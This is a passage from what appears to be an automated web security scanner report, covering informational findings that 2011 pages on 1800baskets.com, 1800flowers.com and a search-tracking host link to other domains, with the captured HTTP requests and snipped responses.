border="0" href="http://www.berries.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

16.20. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.searchignite.com
Path:   /si/CM/Tracking/ClickTracking.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1 HTTP/1.1
Host: track.searchignite.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 09 May 2011 01:00:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PUB OTRo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&jscript=1&u=
Cache-Control: private
Content-Type: text/html

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx?siclientid=3603&amp;jscript=1&amp;u=">here</a>.</h2>
</body>
...[SNIP]...

16.21. http://ww30.1800baskets.com/deliverycalendarnew.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /deliverycalendarnew.do

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=GPT&productPrice=29.99&zip=10010&country=&productSKU=93260&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=93260&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Origin: http://ww30.1800baskets.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903453756&t4=1304903443093&lti=1304903453755&ln=sd&hr=javascript%3AcheckNShowAppParamLightBoxCalendar%28deliveryDate%2Ctrue%29%3B&fti=&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=&fd=&uer=&fu=&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:13 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00001N288SgFQQcgjdh8LBTc6IT:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 52934


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>

<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
...[SNIP]...
<span class="calNavText"><img alt="Previous" src="http://media3.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/calarrowsleft.gif" border="0" /></span>
...[SNIP]...
<span class="calNavText"><img alt="Next" src="http://media3.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/calarrowsright.gif" border="0"/></span>
...[SNIP]...
<span id="shipMessageFed" class="shipMsg"><img src="http://media2.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/shipping_ups.jpg" /></span>
                           <span id="shipMessage" class="shipMsg"><img src="http://media2.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/shipping_florist.jpg" /></span>
...[SNIP]...

16.22. http://ww30.1800baskets.com/product.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /product.do?baseCode=93260&dataset=11309 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/template.do?id=template3&page=2000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.1.10.1304903358; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|1|0|0|0|0|0|0|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903358829&t2=1304903368545&t3=1304903441095&lti=1304903441095&ln=&hr=/product.do%3FbaseCode%3D93260%26dataset%3D11309&fti=&fn=searchform%3A0%3BUNDEFINED%3A1%3B&ac=&fd=&uer=&fu=&pi=18B%3Atemplate-The%20Popcorn%20Factory&ho=blooms.1800flowers.com/cm%3F&ci=90074784&ul=http%3A//ww30.1800baskets.com/template.do%3Fid%3Dtemplate3%26page%3D2000&rf=http%3A//ww30.1800flowers.com/collection.do%3Fdataset%3D10305

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:17:19 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 83726


                                                <html xmlns="http://www.w3.org/1999/xhtml"
    xmlns:og="http://ogp.me/ns#"
    xmlns:fb="http://www.face
...[SNIP]...
<meta property="og:type" content="product_service"/>

   
<link rel="image_src" href="http://media3.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052Lz.jpg" />    
<!-- /*Defect Id:INC000000351640 User:201815 Date:Sep-29-2010 Reason:Meta Tag Change Start*/ -->
...[SNIP]...
<link rel="canonical" href="http://www.1800baskets.com/product.do?baseCode=93260" />

<link rel="shortcut icon" href="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>


<!-- global css zone -->
...[SNIP]...
</style>
<script src="http://w.sharethis.com/widget/?tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=rotate&amp;publisher=a396cc33-4aff-4879-b5e0-d9ab5133031a&amp;headerbg=%23669933&amp;linkfg=%23663399&amp;offsetLeft=-155&amp;embeds=true&amp;button=false&amp;onmouseover=false" type="text/javascript"></script>
...[SNIP]...
</script>


<link rel="stylesheet" type="text/css" href="http://media6.1800flowers.com/800f_assets/jet/website/styles/baskets/triadbannerpp.css"/>


</head>
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="https://ww30.1800baskets.com/customerwelcome.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://ww30.1800baskets.com/ordertracking.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow">
       <img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/icon-cart.gif" alt="Shopping Cart" border="0"/>
       </a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/btn-hdr-checkout.gif" alt="checkout" border="0"/></a>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
<div id="enlargeImgHide" onMouseOut="hideObject('enlargeImg')">

<img
name="bigimage"
src="http://media3.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052Lz.jpg"
border="0" alt="Popcorn Snack Tin - 1800baskets.com" />

</div>
...[SNIP]...
<td valign="top" id="trsHeader">


<img border="0" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/datasetdefaultleft_spacer.gif" />

</td>
...[SNIP]...
<td valign="top" id="trsHeader">


<img border="0" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/datasetdefaultright_spacer.gif" />

</td>
...[SNIP]...
<div class="trsProductImage">

<img id="prodimg"
name="prodimg"
src="http://media3.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052Lz.jpg"
alt="Popcorn Snack Tin - 1800baskets.com" />
</div>
...[SNIP]...
');"
id="calendarLink" class="calendarImage">
<img
src="http://media2.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/calendar.jpg"
alt="Calendar" width="16" height="16" border="0" />
</a>
...[SNIP]...
<td align="left" style="padding-top: 10px; padding-right:8px;"> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/spacer.gif"
height="10" />
<br />
...[SNIP]...
<br />
<img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/spacer.gif" height="10" />
</td>
...[SNIP]...
<a
id="verify" name="verify" href="javascript:checkNSubmit(false)"><img
src="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/btn_addtobasket.gif"
border="0" id="btnAddToBasket" />
</a>
...[SNIP]...
<a id="verifyd"
name="verifyd"><img
src="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/btn_addtobasket_gray.gif"
border="0" id="btnAddToBasket" />
</a>
...[SNIP]...
<input value="0" name="Tab_1_state" type="hidden">
<link rel="stylesheet" type="text/css" href="http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css"/>

<table id="Tab_1_table" border="0" cellSpacing="0" cellPadding="0" class="gui-tab" width="100%">
...[SNIP]...
<div id = "prodMOP7" class = "prodMOP7">
                   <img src="http://a764.g.akamai.net/f/764/16742/1h/www.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/icon_guarantee_new.gif" border="0" />
               </div>
...[SNIP]...
<a href="http://ww30.1800baskets.com/product.do?baseCode=91637&cm_cid=r">
               <img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/91637Lt.jpg" border="0" width="49" height="54" /></a>
...[SNIP]...
<div class="trsFooterLinks">
<a class="footerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9000" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9004" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://affiliateprogram.1800flowers.com" target="_self" rank="">Affiliate Program</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11088" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11117" target="_self" rank="">
...[SNIP]...
</a> - Send us <a class="copylink" href="http://vovici.com/wsb.dll/s/2b42g408c4" rel="nofollow" target="_blank">Feedback on this Site</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/flowers_enterprise_apr9.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/thirdparty_merged_mday1.js"></script>
<script type="text/javascript" src="http://media6.1800flowers.com/800f_assets/jet/website/scripts/flowers/product_apr7.js"></script>
<script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://media5.1800flowers.com/800f_assets/jet/website/scripts/flowers/martha-tab_aug2.js"></script>
...[SNIP]...
</script>


                                       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- Mercent Tag Start -->

<script src="https://cdn.mercent.com/js/tracker.js"
   type="text/javascript">
</script>
...[SNIP]...
<noscript><img
   src="https://link.mercent.com/image.ashx?merchantID=OneEHFlowers"
   style="display: none">
</noscript>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
</script>


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...
<!-- End LP Custom Variables-->


<iframe frameborder="0" width="0" height="0" src="http://adsfac.us/pct_mx.asp?L=305608&source=if"></iframe>
<img src="http://xcdn.xgraph.net/17572/ai/xg.gif?pid=17572&sid=12001&type=ai&pcid=product" width="1" height="1" />


</body>
...[SNIP]...

16.23. http://ww30.1800baskets.com/template.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /template.do?id=template3&page=2000 HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:16:16 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Set-Cookie: JSESSIONID=0000dNGqKXu-V4E9FonaYphG7gq:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 37878


<html>
<head>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">


<title></title>
<meta name="description" content="ThePopco
...[SNIP]...
<link rel="canonical" href="http://www.1800baskets.com/template.do?id=template3&page=2000" />

<link rel="shortcut icon" href="http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico" />


<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>


<!-- global css zone -->
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="https://ww30.1800baskets.com/customerwelcome.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://ww30.1800baskets.com/ordertracking.do" target="_self" rank="">
...[SNIP]...
</a><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/Account_nav_divider.gif" alt=""><a class="NH-headerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow">
<img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/icon-cart.gif" alt="Shopping Cart" border="0"/>
</a>
...[SNIP]...
<a href="http://ww30.1800baskets.com/shoppingbasket.do" rel="nofollow"><img src="http://media1.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/btn-hdr-checkout.gif" alt="checkout" border="0"/></a>
...[SNIP]...
</div>    
    <script type="text/javascript" src="http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/dropdowntabs_v3.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="//libs.coremetrics.com/eluminate.js"></script>
<script type="text/javascript" src="http://media1.1800flowers.com/800f_assets/jet/website/scripts/flowers/cmcustom.js"></script>
...[SNIP]...
<td colspan="2" valign="top" align="center" zone="2">
           <link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_oct.css"/><style>
...[SNIP]...
<a href="../collection.do?dataset=11309&amp;tpfpb2=1" title="Birthday" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_01.png" alt="Birthday"/></a><a href="../collection.do?dataset=11312&amp;tpfpb3=1" title="Thank You" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_02.png" alt="Thank You" /></a><a href="../collection.do?dataset=11491&amp;tpfpb4=1" title="Get Well" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_03.png" alt="Get Well" /></a><a href="../collection.do?dataset=11315&amp;tpfpb5=1" title="Family Night" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_04.png" alt="Family Night"/></a><a href="../collection.do?dataset=11313&amp;tpfpb6=1" title="Bestsellers" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_05.png" alt="Bestsellers"/></a><a href="../collection.do?dataset=11316&amp;tpfpb7=1" title="Gifts Under $30" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_06.png" alt="Gifts Under $30"/></a><a href="../collection.do?dataset=11314&amp;tpfpb8=1" title="Sale" target="_parent" class="hp-leftnav1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/nav050811_07.png" alt="Sale"/></a>
...[SNIP]...
<a href="../product.do?baseCode=93407&dataset=11086&tpfhero"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/TPFHero-050511.jpg" border="0" /></a>
...[SNIP]...
<a href="../product.do?baseCode=93406&dataset=11309&amp;tpfpromo1"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/tpf/TPF-promo1-050411PM.jpg" border="0"/></a>
...[SNIP]...
<a href="../product.do?baseCode=94206&dataset=11086&amp;tpfpromo2"><img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/tpf/TPF-promo2-050511.jpg" border="0"/></a>
...[SNIP]...
<a href="../collection.do?dataset=11491&amp;f1h=1"><img alt="Holiday Preview" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/tpf-feature-getwell.gif" border="0" /></a><a href="../product.do?baseCode=93400&amp;dataset=11491"><img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93400.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<a href="../collection.do?dataset=11313&amp;tpfpb6=1"><img alt="Best Sellers" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/tpf/TPF-feature-best-sellers.gif" border="0" /></a><a href="../product.do?baseCode=94583&amp;dataset=11313"><img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/94583.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<a href="../collection.do?dataset=11309&amp;f3h=1"><img alt="Birthday" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/brandable/TPF-feature-holiday-birthday.gif" border="0" /></a><a href="../product.do?baseCode=93260&amp;dataset=11309"><img src="http://media6.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/93052L.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<a href="../collection.do?dataset=11312&amp;f4h=1"><img alt="Thank You" src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/TPF/tpf-feature-thankyou.gif" border="0" /></a><a href="../product.do?baseCode=94229&amp;dataset=11312"><img src="http://media1.1800flowers.com/800f_assets/images/flowers/images/shop/catalog/94229.jpg" /></a>
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpb/arrow.gif" /></div>
...[SNIP]...
<div class="trsFooterLinks">
<a class="footerlink" href="http://help.1800flowers.com" target="_self" rank="">Customer Service</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9000" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/template.do?id=template4&amp;page=9004" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://affiliateprogram.1800flowers.com" target="_self" rank="">Affiliate Program</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11088" target="_self" rank="">
...[SNIP]...
</a> <img src="http://media5.1800flowers.com/800f_assets/jet/website/images/baskets/banners/hp/hpa/footer_divider.gif" alt=""><a class="footerlink" href="http://ww30.1800baskets.com/collection.do?dataset=11117" target="_self" rank="">
...[SNIP]...
</a> - Send us <a class="copylink" href="http://vovici.com/wsb.dll/s/2b42g408c4" rel="nofollow" target="_blank">Feedback on this Site</a>
...[SNIP]...
<div id="rr_allpages"><script type="text/javascript" src="http://media.richrelevance.com/rrserver/js/0.4/p13n.js"></script>
...[SNIP]...
<!-- pageid END -->


   <script language="javascript1.1" src="http://media2.1800flowers.com/800f_assets/jet/website/scripts/flowers/livePerson/800-chat-sales-english_mtagconfig.js" type="text/javascript"></script>
...[SNIP]...

16.24. http://ww30.1800flowers.com/collection.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800flowers.com
Path:   /collection.do

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /collection.do?dataset=10305 HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
